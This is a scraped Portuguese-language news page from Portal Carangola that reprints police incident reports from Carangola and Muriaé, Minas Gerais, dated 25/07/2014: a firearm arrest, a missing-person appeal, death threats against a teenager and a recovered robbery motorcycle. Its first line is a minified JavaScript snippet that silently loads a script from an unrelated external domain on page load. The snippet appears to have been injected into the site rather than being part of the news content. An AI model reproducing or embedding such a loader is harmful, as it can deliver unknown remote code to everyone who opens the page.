;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais em destaque-Carangola e Região-25/07/2014 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais em destaque-Carangola e Região-25/07/2014

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 25/07/2014

                           75ª CIA PM- CARANGOLA-MG

PM PRENDE POR PORTE ILEGAL DE ARMA DE FOGO EM DIVINO

 Em 24/07/2014, por volta das 16h40min, no Beco José Fernandes, em Bom Jesus do Divino, militares receberam informações que o indivíduo conhecido pela alcunha de “J.H.” estava portando uma arma de fogo. Em rastreamento, J.R.S. de 33 anos, foi encontrado na residência de C.F.F. de 62 anos, o qual informou que o procurado se encontrava dormindo em um dos quartos da casa, haja vista ter chegado com sinais de embriaguez, portando uma arma de fogo. O cidadão disse temer que o acusado praticasse algum delito e então guardou a arma, sendo entregue por ele 01 garrucha .22, ROSSI, desmuniciada. Diante dos fatos foi dado voz de prisão ao autor e conduzido à DPJ.

                        76ª CIA PM – MURIAÉ-MG

PM REGISTRA COMUNICAÇÃO DE PESSOA DESAPARECIDA EM MURIAÉ

Em 24/07/2014, por volta das 08h10min, na Rua Nivercino Ferreira de Souza, no Bairro José Augusto de Abreu, IVANI MARIA DE PAULA, 37 anos, relatou que convive em regime marital com PAULO DOS SANTOS MAIA, 57 anos, e que na data de ontem ela recebeu ligação telefônica do PAULO, o qual lhe informou que estava saindo do distrito de SANTO ANTONIO DO GLÓRIA, e passaria na residência de ambos e depois seguiria viajem para a cidade do RIO DE JANEIRO. Que PAULO estava em um veículo FIAT/STRADA WORKING, cor branca, placa HMD-4624-VIEIRAS-MG. Que desde a última ligação telefônica ela não teve mais contato com PAULO, pois o telefone dele não atende. Que já procurou em vários locais, mas não o encontrou. Que tem altura aproximada de 1,65 cm, peso aproximado de 80 kg, cabelo liso, grisalho e baixo e cor de pele branca, na ocasião ele trajava camisa de gola polo na cor vermelha e bermuda de tectel na cor verde. Que PAULO sempre abastece seu veículo no POSTO F2 e POSTO BRIGADEIRO na cidade de MIRADOURO-MG.

PM EFETUA PRISÃO POR AMEAÇA E USO DE ARMA DE FOGO EM MURIAÉ

Em 24/07/2014, por volta das 13h30min, na Rua Astolfo Menezes, no Bairro Porto, militares fizeram contato com L.F.S. de 16 anos, e esta relatou que seu ex amasio, N.O. de 24 anos, insatisfeito com a separação ocorrida na data de ontem, foi ate a residência de seus pais, onde ela está residindo, e na companhia de F.M.R.S. de 16 anos, estando o ex amásio armado com um revólver, apontou a arma e fez diversas ameaças de morte contra a jovem e seus familiares, e ainda danificou o portão de entrada da casa com vários chutes. Que em seguida o autor citado saiu com o comparsa em uma motocicleta de cor prata. Em rastreamento ambos foram localizados à rua GALILEIA no Bairro MARAMBAIA, na companhia de C.D.S.B. de 24 anos. Foi feita varredura pelas imediações, porém a arma utilizada na ação, não foi localizada. Segundo a reclamante e seus familiares, na data de ontem o autor a agrediu fisicamente, porém o fato não foi registrado e que ela possui diversas mensagens e fotos em seu celular as quais foram enviadas pelo autor, inclusive fotos de arma de fogo, nas quais este ameaça matá-la e ” matar seu pai até sábado”. Diante dos fatos foi dado voz de prisão ao autor e voz de apreensão a seu comparsa, sendo encaminhados à DPJ.

PM LOCALIZA PROVÁVEL MOTOCICLETA USADA EM ASSALTO A POSTO DE COMBUSTÍVEL EM MURIAÉ

 Em 24/07/2014, por volta das 15h40min, na Vila Santa Rita, no Bairro União, militares receberam informações de que a motocicleta SUNDOW HUNTER, cinza, sem placa, ano 2008, que teria sido usada no assalto ao posto de gasolina TRADIÇÃO no dia 22/07/14, estaria abandonada no meio de um matagal. E, em meio a muita vegetação, lograram êxito em localizar a referida motocicleta. Esta não possuía placas e está em mau estado de conservação. No sistema não aparece nenhuma placa relacionada a motocicleta e aparenta nunca ter sido emplacada. A motocicleta foi removida até à DPJ para ser periciada. O pátio credenciado compareceu ao local e fez a remoção da mesma.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.